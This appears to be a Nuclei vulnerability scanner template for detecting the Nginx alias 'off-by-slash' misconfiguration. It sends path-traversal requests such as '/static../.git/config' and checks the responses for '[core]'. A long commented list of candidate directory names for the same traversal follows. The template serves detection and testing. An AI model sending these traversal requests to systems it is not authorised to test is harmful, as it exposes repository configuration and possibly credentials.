id: git-config-nginxoffbyslash

info:
  name: Nginx off-by-slash exposes Git config
  author: organiccrap
  severity: medium
  description: Nginx off-by-slash vulnerability exposes Git configuration.
  reference:
    - https://twitter.com/Random_Robbie/status/1262676628167110656
    - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
  tags: config,exposure,nginx

requests:
  - method: GET
    path:
      - '{{BaseURL}}/static../.git/config'
      - '{{BaseURL}}/js../.git/config'
      - '{{BaseURL}}/images../.git/config'
      - '{{BaseURL}}/img../.git/config'
      - '{{BaseURL}}/css../.git/config'
      - '{{BaseURL}}/assets../.git/config'
      - '{{BaseURL}}/content../.git/config'
      - '{{BaseURL}}/events../.git/config'
      - '{{BaseURL}}/media../.git/config'
      - '{{BaseURL}}/lib../.git/config'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - '[core]'
          
#Archipel
#_static
#acme
#acme-challenge
#acme_challenges
#admin
#adminer
#alpha
#app1-static
#app2-static
#app_dir
#app_nginx_static_path
#asset_img
#assets
#audio
#awstats
#backend
#base_dir
#blankon
#blob
#blue
#bootstrap
#build
#cgi-bin
#challenge
#challenges
#chiminey
#clld_dir
#collected_static
#community
#content
#counterblockd
#counterwallet
#css
#custom
#d
#data
#dataset1
#dataset2
#default
#demo
#demo-app
#developerslv
#dist
#django-blog
#django_project_path
#doc
#docs
#download
#downloads
#error
#errors
#export
#favicons
#favs
#files
#films
#flask_test_uploads
#fm
#font-icons
#fonts
#frontend
#ftp
#ftpmaster
#hgs-static
#higlass-website
#home
#horde
#htdocs
#html
#httpboot
#icon
#icons
#ikiwiki
#image_data
#images
#img
#install
#items
#javascript
#js
#js-plugin
#khanlinks
#kibana
#kolab-syncroton
#latest
#layout
#legal
#lemonldap-ng-doc
#lemonldap-ng-fr-doc
#letsencrypt
#lib
#libs
#log
#logging
#mailinabox
#mailman
#main_user
#manual
#media
#memcached
#minified
#misc
#moodledata
#msks
#munki_repo
#music
#name
#new-js
#nginx
#noVNC
#node_modules
#oldsanta
#option
#outputs
#owncloud
#packed
#patchwork
#path
#pictures
#plugin_static
#postfixadmin
#prod
#project_root
#pub
#public
#public_html
#public_root
#qv-frontend
#repo
#repos
#repository
#resources
#resourcesync
#results
#robots
#root
#roundcube
#roundcubemail
#run
#script
#scripts
#shared
#shibboleth
#site-library
#sitestatic
#spearmint
#src
#stackato-pkg
#static
#static-collected
#static-html
#static-root
#static_prod
#static_root
#static_user
#staticfiles
#stats
#storage
#style
#styles
#stylesheets
#target
#temp
#templates
#test
#testfiles
#tests
#theme
#theme_static
#thumb
#thumbs
#tiedostot
#tmp
#ubuntu
#ui
#unsplash-downloader
#upfiles
#upload
#uploads
#videos
#web
#web-dist
#webroot_path
#websocket
#webstatic
#well-known
#whturk
#wp-content
#www
#www-data
#zmusic-frontend